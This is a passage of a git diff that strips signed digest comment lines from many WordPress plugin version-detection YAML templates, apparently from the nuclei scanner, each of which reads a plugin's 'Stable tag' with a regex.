2ec1940f21..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b4cec05978e3fd5729b58538fd75c837de7f708ebdaf761f3e4c4808786251ab0221009a3e78c2987a2b5c468ea78f70bfbb00cdfca6c2050c3ded7e4775e2f180b942:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59dbc529d1..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c46fbf997f12c4f942cce6be5c7de7226baf2fd5bb712cb0cec7b46ff79b901702206ec420a9a26e47047f11d941a8ce66063ec58bb709e5d89d379d9f8079bb20f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 9b8e4b7558..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220028c5013df54a65100d03f227c54e9a3b4bad3b5df8b08ce5ee6bbcdfc69afaa022100ff948dbc051e2f79b1572eeff59e5b10fafd82649ae443fb09a3993d0749fb07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index e9ec2c1adc..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009450bce55e1341db15fa228d47f8d391c588f9b737332f06a918056e90e5b2cc02207037ba3cf0f9cb08c5d58caef80202cd2593fc42ac0eee5a2e911c30b89f3e08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 54fe67d95b..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022016be700c3d0af850a6b3ed5f56909ff586b88f102c15b796cc24c42414cb53eb02201d7497bba13588cbcc7b570ba5ef35fd561dbdc41dc149c3ca61d67e3dab4f44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index ada94181a3..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022042a1f364b74f217ef256400da3522f9e5976370ce2a6b8b94c2bab901ce39afd022100dd80459b10d2574f660a626fac51c618012e3585f0018f21f29511168663f629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 7850599dc2..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b61989bd78d0161c107173b8cee82a1f39b05fe295710bc2016a49bd8cf0a9be022020be60d6395bfd51d92409783220fa375cff26b6950538b9ef43cca4436035ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 7131275310..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220212b4ed435cdd981d9cd58d0e6785fe914e400d61e9be356e0dd5d2af471c36e022100d9200835e2168db83bc19021698c4825114a16e81674a87b84dff3794f52bd99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index a3e0786d75..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203fab07aeb4943adcc44d54bd5ae39dbd36fbc9cc23025bb1dd39e9a91119aa6702200c26e02d35419ce25165659c2befe5e9a9cf1a9bc4f4fc8ed960f104464f01c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 504e96476d..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ddc33475331801c3c98cb596093a1fd1c8c0b59f8b8563ef97afa999d20b4861022100c3fb4fb6e0966780ca77d9e7d0f5f02e856a88de8ba1a1211b0075509b69b275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index b2f593bb9a..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207c5539f386411d6917ed24a60539bc28d52e1fc28426c2f0641d4d8f5e638047022018377b71d0c894c1537a0b3b8299fd38925982bc066065f82dd057f1e1895d98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 729ccb0a05..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a06b29b2a1811b8bf677899d2a11db76e18dfa7cda30cbdd2750fba45353e45b022100fd510381cffdbda2477c7198413b88537482027c19306c230e7093349ad9f100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 8f0210d573..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207617051609ac9c6905260aba997c8492d2bdd3ef4ed856659e72b94337d14216022100effd7cb7ba5e707c9df6059ea0d83ba227883458a530ad44ea81807c21734f8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 4aee1be968..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079ac90a2c532fedbda0fe21d746216370d5eb1d56ff0b578a8cf8964100047e102200fceb1bf09ab495b1306526489f9d75bfceec3ad3bffe56ef55f43c9e46c14ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index ca31474fae..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204fbe736926167629944cef404ed890029b5b92224aa0a52aa8518b6353ba4db702206668d951c3f81499ffbad63936a2112e09b7ab8d5ab2391b7dd9c4a992b74c9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 232e79bad7..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220561a8f828d00ea0f538c1df5fa5020a36274e87b23ee2e63b87be6d3d102cd99022100c0677d793bd3bbdd6a6e416f00a9ad5d04fcce054871a806137badc731fa7a52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index c9b3d0d949..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c8e998321f5b2fbe1f17e641eca01732c11301da60e7f4d7632f0f7dc862a328022100f072dfaa96a7376ed86a2828c0add068418308969aea442739742f89fbc42aa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 78b7a2c622..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022062b932cebe08ca85fb150767855fe8373be2770d033fac7518619423430c1432022100e0b90551ee3ed888f2dc6620fce7d02339ceb141df757f11d230ceb49d2c47fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index b793c0068f..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201a05e874d37fa78054619ea667f7a9b8242a7819b8586e491995bb4e2089090f02210093dc84e41402a888cee947a04bd4acf8805e936c02d56d9af9103a284a7f0d37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 33ea1daede..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c5f1741a4876580447ee38d9e1d0e797f00c51c8c56fbeee08f27826686fcdb2022100f8b181b2f46f77dcb799d560b81eed4b69c9e434beff3c7c45589265d372c140:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 3c1240ae92..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206b923a678ba509b146daa215ea0692e19763f52e5b5de9c282285de3f1159a2c0221009492b93013f7440f2b1c21b276cb5756d30234a65e8a12746e83003ffcf6be93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 04f9d72753..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220167944c89f5042e52c32592499ee8a990b5a84a202136d602a270f0cd8c308470221009c83dac5e3e30e502932bca4dad340a83ac0fb57b832899240f87f8230311045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index e75672d9b3..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d94a5f2c61c3f2422c6fa91fdddfaa962ae3e202e38c2faac0ff3583c715228702210098ab54e54f4bf9eb6a0eb9065d3bbc9a007cf9bf1c383fa5c718593d43a456da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 6be7fca03a..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022064ad379085043f771058e40b5aad28c83fcb29daea9dc5ef98411a6c93b27bac02206b9497849533d97eae9cda441bd605c76152341ecb5c9417ebb9026a059ec03a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index f60335c7dd..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022021e9c828c3d7088e6037488c4b2e192deb8ad5367286fe63ee6e1730aef9d72a022100b960a1ff71c6a7d579864bf66f4eb7961a51153f3f3a74230e267d603351f556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 46d1dcb29b..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201ccc3a2a266b288d137e66ca99dd658c91d36b0e6aa7a8a20b0abf151be823db0221008e2155ef1bb771b35f081e215142b4e8d3053ad0a77e60143f5a07865476f513:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 8bf2745688..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200a8d1ac416060275d8bf829af9652259430b7263c182b49c8e4a0c27017124d802210089908ddeaa6411ba5630c3ca04ff1333d40bc27c0d0fbfe6baa158b8b661f7cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 7246429067..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009223d1c8ebf897d86a1ff57bbea64186c2b841d8912af5e89dce4761ede4c3fe022100d5e9260d3badacc450234ef3f32d267887af7d5353881135203e50585d05fa6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 9945c51e95..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022025823ba771df7acb4b74139b6adeaec2794d71e28b1eab72849a3db862ee4d720220613ddc327303ba3421a170d568420262abb7eef25bd6e5bc9e55bdb7bef4203c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index c6777c9ead..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fa0acd282bb4884d7c1ce1fbbfe61fbd1b1466d924d2d7fa2de9c4226f8cdb08022100db3f53cd420f8e5615f56505ca4bc2505fa9a498cad49dd3f36ab51efee9a3f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 0fdf5396dc..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204d25bd757b8efded4e6332ac884fada07d9d997a3aa46e63648755fb63235b4b022100ec1be1e929ab7efae359d8baea63db04cfd6913458e8d6690f96d29a6a5a61ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 9ecab359ee..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dafeb53912de1244779f4b517a549216d1eaceaaa246ce660d380aa9ab810d1f022100de23f333e5c4c162a5b4355835315fea8e0c6b1f7caea6ca10c3f8c5e5175bfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 013f2060b7..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203cef452d9334928a2720f2b9cb700eaf037a7f5d8f2633935600962e4cd10f4c0220479ced53afa4d19e0de5f820fd84a2419babe0dc07caa90b38299e6384f23619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 957777bd33..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a549a2f9c95a91b0a80ca76f7b656b08a08c74c97fddf7781bc7274a27923afd022100916ed6f1ebd91a8f271f8d7257929cd0705d7e55c6383dbad35e26f7eab42768:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index b2bb724fb6..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200bf9a7a5ae4e128b090f3d3880ad8f263674603084b4e228f1a3914023de93a2022100ee97a8db80937e6f0f4ebc0ddebac2dad59b6429008654e051952e1ebdf60acc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 231e1fa66f..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202317629388847e2579088eab973a0413c6bc3c22d47e7c7a2bd45a30434a9a78022100bc63eede7c3b20bb9c0c6eac2f54ead993f1c7026f0f56e607bf4d6837e7341b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 6f06f2be5b..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220237dbf596c2f2a9baadb30c8b5e8c2b962a9d08c74ab41e3b0370849a2572ec9022046715951a8bde589428116b8521d6fbafd7cfda2d3f99f1ca05bceb24415ecf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 45a0515e3b..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009c5b81779c7ee5d067402ad4e7b508cc5da73e2cad84fbb865999f82cbcbc7eb022100b8bbf881ab7c35d1d3ef320f3b8e4df95c0a2eabf42e8ffd68f64cdae006ffc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 03260055b1..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e7914ee840a192eacb0d57b1ffb60d8275afc1e5bbde486a8b3115e996e8ce6c022031538ceffdf71696a3e30b12a16c529abf70d9baa89df1599e14e75f194c7c14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index e066a30a40..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b521961166080fae8765e878db91e6882609ff7ed872a083466325aae85ebba802206bf0c7e74b38a7832196bf855f4dd8b79a61b523d5b18d56aa467cb9ed1f0bdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 23b6e514fc..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204665c206d655bc19b2153d9b4b8e39df32926b85261f9a36697ead43bd0c80eb0220724bdf532c2dff16f75c25799861cc281fd23a86920af8208e07cd4637d3b576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 4aa1e6b200..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202c3a43603e41eab613dbbd5d8435f67b935a9efee2c317088aca47b5ec297381022100cae7311d0b97a70fab53b0d26edea97a49ab7f4cbca3423d80751755b3499bac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b3a7591513..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009a383cd416aa90204949b7d2a43254fc4793c64b5554a99ef95b1d0f803deec9022100d3597c69437753d87dc0b316bf028f9fbfef58dfbe48fae5f589c32aeae28cf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index d651f7012c..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cf111c5923d97b0204e6c0b71d8f987cd6c5b29280ae195313f9e3f9569a6cde02206bd9b8ad373761754f3ae9a847f950af969e088477c1696f7695c63bd78c3287:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 6e6b727c0e..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204b118685072115a827b948f9b33cf4f931c8ca663447429039a2d2fd4efc2941022100f607c3f8c9eb12c742897733c9924880e6a4ad6d054ceda5414eaf9f2262f09b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 0f57e9a361..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009deb37871825b0c7f4bc94f1cc7c43ea910962a867e9a691e181df4468ea490002205c1919a080fb490a35c5d55afebc875f7155666cd1a7e2e7f0ace5e6e366fe20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 81027331aa..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c38c6e7ae4b0b920d689826a0e24b3cc12239a5a1a2f10fdef2936851c816114022100f565f47314006a673aed4d83f85142505097efb6ec427f650658b4ea02e505b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 04a87572fa..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 